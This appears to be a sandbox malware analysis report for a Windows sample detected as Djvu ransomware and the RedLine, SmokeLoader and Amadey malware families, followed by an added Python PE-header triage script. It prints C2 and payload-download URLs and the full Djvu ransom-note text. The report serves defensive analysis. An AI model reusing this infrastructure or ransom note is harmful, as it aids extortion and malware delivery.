Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 722349
MD5: 9e93319d00389f1c55611665e404ea9b
SHA1: 23aa8aed6a57519e0c4107fc6f6a7f16efe20741
SHA256: 4e189ba8eaaecc5142cc89fe40d696d216291e906f66b261af8bb0eda2bdcf60
Tags: exe

Detection

Amadey, Djvu, Fabookie, RedLine, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Fabookie
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign process
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Detected VMProtect packer
Writes to foreign memory regions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)

Classification

AV Detection

Source: C:\Users\user\AppData\Local\Temp\EAA.exe Avira: detection malicious, Label: HEUR/AGEN.1210630
Source: C:\Users\user\AppData\Local\Temp\2A57.exe Avira: detection malicious, Label: HEUR/AGEN.1210630
Source: kkh.eiwagggg.com Virustotal: Detection: 5%
Source: en.eredirected.xyz Virustotal: Detection: 21%
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ECFD.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EAA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2A57.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\udgatra Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9763.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EB37.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B03C.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\tfgatra Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\543.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\857.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3804.exe Joe Sandbox ML: detected
Source: 10.0.3804.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.3804.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.3804.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.3804.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://liubertiyyyul.net/", "http://bururutu44org.org/", "http://youyouumenia5.org/", "http://nvulukuluir.net/", "http://nuluitnulo.me/", "http://guluiiiimnstra.net/"]}
Source: 9.0.ECFD.exe.400000.7.unpack Malware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://winnlinne.com/files/1/build3.exe"], "C2 url": "http://winnlinne.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-oTIha7SI4s\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0581Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", 
"C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 172.67.144.83:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.220.204.62:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.17.35:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 198.23.58.153:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 66.96.149.30:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 66.96.149.30:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\dobixuyapuxez\cohimu_88 jekumuhe\67.pdb source: F4FD.exe, 00000006.00000000.449000017.0000000000401000.00000020.00000001.01000000.00000008.sdmp, udgatra, 00000015.00000002.602489552.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, udgatra, 00000015.00000000.543137145.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: C:\topefife94\vafivesobuvo12\nugotelosowos\jiwewoha.pdb source: file.exe
Source: Binary string: #+C:\dobixuyapuxez\cohimu_88 jekumuhe\67.pdb source: F4FD.exe, 00000006.00000000.449000017.0000000000401000.00000020.00000001.01000000.00000008.sdmp, udgatra, 00000015.00000002.602489552.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, udgatra, 00000015.00000000.543137145.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: .C:\topefife94\vafivesobuvo12\nugotelosowos\jiwewoha.pdb source: file.exe
Source: Binary string: ]C:\setupipayadewu\gala\muhoci-yileyowip71.pdb source: ECFD.exe, 00000005.00000000.443846038.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe, 00000009.00000000.486986085.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe.1.dr
Source: Binary string: C:\feyiguha\pelejitahuhufe14 gewofaj.pdb source: 543.exe, 0000000B.00000000.489003730.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\setupipayadewu\gala\muhoci-yileyowip71.pdb source: ECFD.exe, 00000005.00000000.443846038.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe, 00000009.00000000.486986085.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe.1.dr
Source: Binary string: MC:\ziradevetu84\faduxusiyipa29\jigi.pdb( source: 3804.exe, 0000000A.00000000.485964331.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: CC:\feyiguha\pelejitahuhufe14 gewofaj.pdb source: 543.exe, 0000000B.00000000.489003730.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\ziradevetu84\faduxusiyipa29\jigi.pdb source: 3804.exe, 0000000A.00000000.485964331.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

Networking

Source: C:\Windows\explorer.exe Domain query: kkh.eiwagggg.com
Source: C:\Windows\explorer.exe Domain query: keziheritier.com
Source: C:\Windows\explorer.exe Domain query: github.com
Source: C:\Windows\explorer.exe Domain query: furubujjul.net
Source: C:\Windows\explorer.exe Domain query: pelegisr.com
Source: C:\Windows\explorer.exe Domain query: www.rukangiralawchambers.org
Source: C:\Windows\explorer.exe Domain query: avtlsgosecure.com
Source: C:\Windows\explorer.exe Network Connect: 45.138.74.52 80
Source: C:\Windows\explorer.exe Network Connect: 179.43.163.115 80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49696 -> 172.67.203.213:80
Source: Traffic Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.5:49697 -> 45.138.74.52:80
Source: DNS query: jamesmillion.xyz
Source: DNS query: en.eredirected.xyz
Source: DNS query: en.xml-post.xyz
Source: Malware configuration extractor URLs: http://winnlinne.com/lancer/get.php
Source: Malware configuration extractor URLs: http://liubertiyyyul.net/
Source: Malware configuration extractor URLs: http://bururutu44org.org/
Source: Malware configuration extractor URLs: http://youyouumenia5.org/
Source: Malware configuration extractor URLs: http://nvulukuluir.net/
Source: Malware configuration extractor URLs: http://nuluitnulo.me/
Source: Malware configuration extractor URLs: http://guluiiiimnstra.net/
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Oct 2022 11:07:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 13 Oct 2022 11:00:53 GMTETag: "34a00-5eae86c49704d"Accept-Ranges: bytesContent-Length: 215552Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 9c 0f ba d7 fd 61 e9 d7 fd 61 e9 d7 fd 61 e9 c9 af f4 e9 c0 fd 61 e9 c9 af e2 e9 ac fd 61 e9 f0 3b 1a e9 d0 fd 61 e9 d7 fd 60 e9 41 fd 61 e9 c9 af e5 e9 e3 fd 61 e9 c9 af f5 e9 d6 fd 61 e9 c9 af f0 e9 d6 fd 61 e9 52 69 63 68 d7 fd 61 e9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 58 a7 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d6 01 00 00 5a 17 00 00 00 00 00 f6 a0 00 00 00 10 00 00 00 f0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 19 00 00 04 00 00 c0 8d 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc d7 01 00 50 00 00 00 00 d0 18 00 38 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 39 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa d4 01 00 00 10 00 00 00 d6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 1c dd 16 00 00 f0 01 00 00 22 01 00 00 da 01 00 00 00 00 00 00 00 00 00 
00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 4c 00 00 00 d0 18 00 00 4e 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Thu, 13 Oct 2022 11:07:19 GMTContent-Type: application/octet-streamContent-Length: 6174208Last-Modified: Thu, 13 Oct 2022 11:00:44 GMTConnection: keep-aliveETag: "6347efdc-5e3600"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 90 09 00 00 a2 54 00 00 00 00 00 74 9e 09 00 00 10 00 00 00 a0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 5e 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 09 00 cc 24 00 00 00 d0 0a 00 00 b0 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0a 00 bc ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 d4 8e 09 00 00 10 00 00 00 90 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 c4 18 00 00 00 a0 09 00 00 1a 00 00 00 94 09 00 
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 c9 0c 00 00 00 c0 09 00 00 00 00 00 00 ae 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 cc 24 00 00 00 d0 09 00 00 26 00 00 00 ae 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 00 0a 00 00 00 00 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 10 0a 00 00 02 00 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 bc ae 00 00 00 20 0a 00 00 b0 00 00 00 d6 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 b0 53 00 00 d0 0a 00 00 b0 53 00 00 86 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 80 5e 00 00 00 00 00 00 36 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
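Added example, not part of the report: both responses above carry a PE image (each body starts with 4d 5a, "MZ"), one served as application/x-msdos-program from Apache and one as application/octet-stream from nginx. The parser below walks the header of the first one, using the first 0x258 bytes of its Data Raw dump exactly as printed in the report, and then runs three checks a proxy or sandbox post-processor can apply to any downloaded body: MZ body versus the declared Content-Type, entry point inside a standard code section, and sections that are writable and executable or whose VirtualSize far exceeds SizeOfRawData. The parser, the checks and the 4x threshold are this example's own, not the sandbox's signatures.

```python
"""Added example, not part of the report: parse the PE header of the first
executable the sandbox saw downloaded over HTTP. RAW_HEX is the first 0x258
bytes of that response's "Data Raw" dump as printed in the report (DOS header,
DOS stub, Rich header, PE/COFF header, PE32 optional header, section table)."""
import struct

RAW_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
93 9c 0f ba d7 fd 61 e9 d7 fd 61 e9 d7 fd 61 e9 c9 af f4 e9 c0 fd 61 e9 c9 af e2 e9 ac fd 61 e9
f0 3b 1a e9 d0 fd 61 e9 d7 fd 60 e9 41 fd 61 e9 c9 af e5 e9 e3 fd 61 e9 c9 af f5 e9 d6 fd 61 e9
c9 af f0 e9 d6 fd 61 e9 52 69 63 68 d7 fd 61 e9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 58 a7 60 00 00 00 00 00 00 00 00 e0 00 03 01
0b 01 09 00 00 d6 01 00 00 5a 17 00 00 00 00 00 f6 a0 00 00 00 10 00 00 00 f0 01 00 00 00 40 00
00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 19 00 00 04 00 00
c0 8d 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00
00 00 00 00 00 00 00 00 fc d7 01 00 50 00 00 00 00 d0 18 00 38 4c 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 39 00 00 40 00 00 00 00 00 00 00 00 00 00 00
00 10 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
2e 74 65 78 74 00 00 00 fa d4 01 00 00 10 00 00 00 d6 01 00 00 04 00 00 00 00 00 00 00 00 00 00
00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 1c dd 16 00 00 f0 01 00 00 22 01 00 00 da 01 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 4c 00 00 00 d0 18 00
00 4e 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40
"""
CONTENT_TYPE = "application/x-msdos-program"  # Content-Type of that response in the report

COFF_FLAGS = {0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
SCN_EXECUTE, SCN_WRITE = 0x20000000, 0x80000000


def decode_characteristics(value):
    return [name for bit, name in sorted(COFF_FLAGS.items()) if value & bit]


def parse_pe_header(data):
    """DOS header -> PE signature -> COFF header -> PE32 optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsect, _stamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images handled here")
    entry, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<I", data, opt + 28)
    size_of_image, = struct.unpack_from("<I", data, opt + 56)
    sections = []
    for i in range(nsect):  # section table starts right after the optional header
        (name, vsize, rva, raw_size, raw_ptr, _reloc, _lines,
         _nreloc, _nlines, flags) = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "virtual_size": vsize,
                         "rva": rva, "raw_size": raw_size, "raw_ptr": raw_ptr, "flags": flags})
    return {"e_lfanew": e_lfanew, "machine": machine, "characteristics": chars, "entry_point": entry,
            "image_base": image_base, "size_of_image": size_of_image, "sections": sections}


def section_for_rva(sections, rva):
    for s in sections:
        if s["rva"] <= rva < s["rva"] + max(s["virtual_size"], s["raw_size"]):
            return s
    return None


def triage(content_type, body):
    """Cheap checks on a downloaded body; thresholds are this example's, not the sandbox's."""
    findings = []
    if body[:2] != b"MZ":
        return findings
    if not content_type.startswith(("application/x-msdos", "application/x-msdownload", "application/octet-stream")):
        findings.append(f"PE body served as {content_type}")
    hdr = parse_pe_header(body)
    ep = section_for_rva(hdr["sections"], hdr["entry_point"])
    if ep is None or not ep["flags"] & SCN_EXECUTE or ep["name"] not in (".text", "CODE"):
        findings.append("entry point outside a standard code section")
    for s in hdr["sections"]:
        if s["flags"] & SCN_WRITE and s["flags"] & SCN_EXECUTE:
            findings.append(f"{s['name']} is writable and executable")
        if s["raw_size"] and s["virtual_size"] > 4 * s["raw_size"]:  # big zero-filled gap to unpack into
            findings.append(f"{s['name']} virtual size 0x{s['virtual_size']:x} dwarfs raw size 0x{s['raw_size']:x}")
    return findings


if __name__ == "__main__":
    body = bytes.fromhex(RAW_HEX)
    hdr = parse_pe_header(body)
    print(hex(hdr["machine"]), decode_characteristics(hdr["characteristics"]), hex(hdr["entry_point"]))
    for s in hdr["sections"]:
        print(f"{s['name']:8} rva=0x{s['rva']:06x} vsize=0x{s['virtual_size']:06x} raw=0x{s['raw_size']:06x}")
    print(triage(CONTENT_TYPE, body))
```

On this body the only hit is .data: VirtualSize 0x16dd1c against SizeOfRawData 0x12200, roughly 1.4 MB of zero-filled space that the loader maps but the file does not carry. That is the layout an unpacking stub needs (write the real payload into the gap, then change the section protections), which is what the report's "Detected unpacking (changes PE section rights)" signature observes at run time. The COFF characteristics decode to RELOCS_STRIPPED, EXECUTABLE_IMAGE and 32BIT_MACHINE, the same three the report lists for file.exe. The second response can be fed through the same parser: its DOS stub reads "This program must be run under Win32" and its section table names CODE, DATA, BSS, .idata, .tls, .rdata, .reloc and .rsrc, the naming a Delphi-family linker produces.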
